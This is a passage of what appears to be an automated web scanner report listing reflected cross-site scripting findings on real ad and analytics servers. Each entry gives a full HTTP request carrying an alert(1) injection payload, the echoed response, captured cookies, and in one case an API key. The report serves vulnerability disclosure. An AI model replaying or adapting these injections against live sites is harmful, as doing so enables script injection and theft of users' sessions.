User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:43:20 GMT; path=/
Set-Cookie: i_1=46:477:987:45:0:38108:1300830200:B2|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L; expires=Thu, 21-Apr-2011 21:43:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 951

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*de07c'-alert(1)-'6a4bc9f3825http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.987.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcatego
...[SNIP]...

1.177. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c47d5'-alert(1)-'699efdbd867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcategory-legal-matters%3B_ylt%3DAvy6SeQ7msNsv0vs8J.ekvsUaq9_%3B_ylu%3DX3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&c47d5'-alert(1)-'699efdbd867=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:44:01 GMT; path=/
Set-Cookie: i_1=46:477:985:45:0:38108:1300830241:B2|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L; expires=Thu, 21-Apr-2011 21:44:01 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 954

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&c47d5'-alert(1)-'699efdbd867=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.985.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcate
...[SNIP]...

1.178. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload b0db8<script>alert(1)</script>b9d279cd0fe was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388&pid=1098767b0db8<script>alert(1)</script>b9d279cd0fe&ps=-1&zw=250&zh=325&url=http%3A//www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/&v=5&dct=Chris%20Pontius%20to%20Divorce%20--%20'Jackass'%20Star's%20Marriage%20--%20The%20Party's%20Over%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=chris%20pontius%20divorce,jackass%20star%20divorce,claire%20nolan HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:06 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "1098767b0db8<script>alert(1)</script>b9d279cd0fe"

   
                                                           </head>
...[SNIP]...

1.179. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 552fa--><script>alert(1)</script>fa864e4f42d was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388552fa--><script>alert(1)</script>fa864e4f42d&pid=1098767&ps=-1&zw=250&zh=325&url=http%3A//www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/&v=5&dct=Chris%20Pontius%20to%20Divorce%20--%20'Jackass'%20Star's%20Marriage%20--%20The%20Party's%20Over%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=chris%20pontius%20divorce,jackass%20star%20divorce,claire%20nolan HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:04 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3414


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1512388552fa--><script>alert(1)</script>fa864e4f42d" -->
...[SNIP]...

1.180. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload b5d4d--><script>alert(1)</script>23818e2f9a1 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388&pid=1098767&ps=-1b5d4d--><script>alert(1)</script>23818e2f9a1&zw=250&zh=325&url=http%3A//www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/&v=5&dct=Chris%20Pontius%20to%20Divorce%20--%20'Jackass'%20Star's%20Marriage%20--%20The%20Party's%20Over%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=chris%20pontius%20divorce,jackass%20star%20divorce,claire%20nolan HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3853


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1b5d4d--><script>alert(1)</script>23818e2f9a1" -->
   
...[SNIP]...

1.181. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload d6988<script>alert(1)</script>ed5d2d40fa6 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1460828&pid=1039767d6988<script>alert(1)</script>ed5d2d40fa6&ps=-1&zw=270&zh=325&url=http%3A//www.tmz.com/signup/&v=5&dct=Sign%20Up%20%3A%20TMZ&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signup/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:45 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "1039767d6988<script>alert(1)</script>ed5d2d40fa6"

   
                                                           </head>
...[SNIP]...

1.182. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 29ff0--><script>alert(1)</script>fdf4fdf96f2 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=146082829ff0--><script>alert(1)</script>fdf4fdf96f2&pid=1039767&ps=-1&zw=270&zh=325&url=http%3A//www.tmz.com/signup/&v=5&dct=Sign%20Up%20%3A%20TMZ&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signup/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:43 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3263


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "146082829ff0--><script>alert(1)</script>fdf4fdf96f2" -->
...[SNIP]...

1.183. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 795cc--><script>alert(1)</script>a8659e6fe24 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1460828&pid=1039767&ps=-1795cc--><script>alert(1)</script>a8659e6fe24&zw=270&zh=325&url=http%3A//www.tmz.com/signup/&v=5&dct=Sign%20Up%20%3A%20TMZ&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signup/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:48 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3702


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1795cc--><script>alert(1)</script>a8659e6fe24" -->
   
...[SNIP]...

1.184. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload d4ba4<script>alert(1)</script>bc87e6e849a was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callbackd4ba4<script>alert(1)</script>bc87e6e849a&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=11; BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=isN6iiVsW5zFhVmEhp3wvBQNQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGD2H0Stu1ELhpOip8NLReVQ9cii8xtm6s0Hip0A8TiitEcowvl4NsnRGPKtcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL0zyiscBAuipHM1ExkNK7HUtFQY8D8EoTSfaf7iipmAlmIZAYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYstRkVjWishJC0gucyDYser1fdsnRGwuisv9jrqxbyIfV5JX6trrRJipuQVyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZwXlJpOhLiizNpNr6IkhgpAMODCrIgmWLJQBrVq3qQ1x0fOfkii7hvjhMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMBkU3ztEG5cdSFEnkb4zys7dsnRGwuisv9s0isadgqzolKiiGTEbnCgyE1cii8xtm6s0H62f9zbDfGLCNDknU2KiiK5XJZXKAa9DdLgeLHSyEVCqewehdQ95muediiOubPaoV2GOSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspDrlNVQ5pXipFqPldy6c1wwH4DELwm2ipwNTWf9VC0MxLPTbwiiAhQOisLVKYdIhNR58XPyXdljTHnfzipb2oENiijskVSyOgJ4DcQ5edL23LzEBHTPBC90eHipCeVH8XNipcUA3d6nxb7Y0jHGaJiscreecN0ziiMENE8hb9sxipRPP7waXBw5lp0goYX9K7jdZVWdE1d63tNNKpPRTfwMQqDyBpTexjvLSfG0NTggQisBis0pCAWoAbL7XvSbTbMY6Ieq2OBIPZG9mAlnvY8niieUipd4xQFIMQ7ehpLrwT8iiuaxkLxWAAQVxxRbeRNLwnxEF0959EwhxcAYMQm1wy5m7EDaANucbTBLcziplMN7DjmeRlE5k9TOFLeZzxcHjVQX6FvC2QlLeG1tBOXsjWJGU6RQpSM5WNTMSIVyQOSx97NRNJpDJ16j2O6jcjBhYz1yXsZu82jLlm5f2DhmMwRPaEip1TDoODPXCk2EPiiJWd8pSf2DhmMwRPaEEyVWdZkawipgieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 23 Mar 2011 19:39:57 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGD2H0Stu1ELhpOip8NLReVQ9cii8xtm6s0Hip0A8TiitEcowvl4NsnRGPKtcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL0zyiscBAuipHM1ExkNK7HUtFQY8D8EoTSfaf7iipmAlmIZAYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYstRkVjWishJC0gucyDYser1fdsnRGwuisv9jrqxbyIfV5JX6trrRJipuQVyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZwXlJpOhLiizNpNr6IkhgpAMODCrIgmWLJQBrVq3qQ1x0fOfkii7hvjhMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMBkU3ztEG5cdLBha6kthwIisdsnRGwuisv9mZEDVPiiMqiiNvExP2Dh3Oul4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57W6VziiCkPMvH9NXzJIXKwEOngHh2VamB2KYReZ9DdNipeWZeNrAP48OG0iitTSisiiLqHnLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNklFRQipipME2BqGE9IMbLKSQbomThxw1ER9zZ2cyepk22LZSLKb60RwfHvoJRhZisp9mPKwxk8vX8bu41cKis37glbYipxtTrEXFeYW6HhoHJVyDFhVekVuLeYFkKQtxtPM0gsEpe7mBL3E1OjqGfEdw8QtQyisW5iib7XEipisWbR76OBjrMoW8LZCUt4bW0E5eyNYkZTpFClIzlY1Mx9p8jSxr5ipu2tkL6jwnvIpfisE3NuBdC9DWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 414
Connection: keep-alive

cnnad_bizo_load_ad_callbackd4ba4<script>alert(1)</script>bc87e6e849a({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"information_technology","name":"Infor
...[SNIP]...

1.185. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload bbc7c<script>alert(1)</script>5c175562314 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr4bbc7c<script>alert(1)</script>5c175562314 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=11; BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=isN6iiVsW5zFhVmEhp3wvBQNQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGD2H0Stu1ELhpOip8NLReVQ9cii8xtm6s0Hip0A8TiitEcowvl4NsnRGPKtcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL0zyiscBAuipHM1ExkNK7HUtFQY8D8EoTSfaf7iipmAlmIZAYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYstRkVjWishJC0gucyDYser1fdsnRGwuisv9jrqxbyIfV5JX6trrRJipuQVyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZwXlJpOhLiizNpNr6IkhgpAMODCrIgmWLJQBrVq3qQ1x0fOfkii7hvjhMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMBkU3ztEG5cdSFEnkb4zys7dsnRGwuisv9s0isadgqzolKiiGTEbnCgyE1cii8xtm6s0H62f9zbDfGLCNDknU2KiiK5XJZXKAa9DdLgeLHSyEVCqewehdQ95muediiOubPaoV2GOSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspDrlNVQ5pXipFqPldy6c1wwH4DELwm2ipwNTWf9VC0MxLPTbwiiAhQOisLVKYdIhNR58XPyXdljTHnfzipb2oENiijskVSyOgJ4DcQ5edL23LzEBHTPBC90eHipCeVH8XNipcUA3d6nxb7Y0jHGaJiscreecN0ziiMENE8hb9sxipRPP7waXBw5lp0goYX9K7jdZVWdE1d63tNNKpPRTfwMQqDyBpTexjvLSfG0NTggQisBis0pCAWoAbL7XvSbTbMY6Ieq2OBIPZG9mAlnvY8niieUipd4xQFIMQ7ehpLrwT8iiuaxkLxWAAQVxxRbeRNLwnxEF0959EwhxcAYMQm1wy5m7EDaANucbTBLcziplMN7DjmeRlE5k9TOFLeZzxcHjVQX6FvC2QlLeG1tBOXsjWJGU6RQpSM5WNTMSIVyQOSx97NRNJpDJ16j2O6jcjBhYz1yXsZu82jLlm5f2DhmMwRPaEip1TDoODPXCk2EPiiJWd8pSf2DhmMwRPaEEyVWdZkawipgieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 23 Mar 2011 19:40:09 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
